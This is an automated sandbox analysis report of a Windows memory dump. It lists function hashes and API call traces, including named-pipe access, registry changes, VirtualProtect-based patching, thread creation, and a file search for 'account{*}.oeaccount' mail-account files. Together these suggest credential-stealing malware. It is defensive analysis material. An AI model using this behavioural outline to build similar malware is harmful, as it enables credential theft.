  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C47EC, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39 Total matches: 38memory
Similarity
  • Total matches: 38
  • API ID: HeapFreememcpy
  • String ID: ($Client
  • API String ID: 2443564160-90774469
  • Opcode ID: 4c92a37d4490a7167670f7697e6105d9cf60d964df118a6b4f918dcc470b9dca
  • Instruction ID: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
  • Opcode Fuzzy Hash: B4D02B712800C2031407A1815C313FA06B33E026DF89C6721FF64284848DD6DBE42B09
  • Instruction Fuzzy Hash: c1e00d211da7bd7c46413cc8967d8cd207c068dedf10a28f474e265e557727d1
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
  • HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
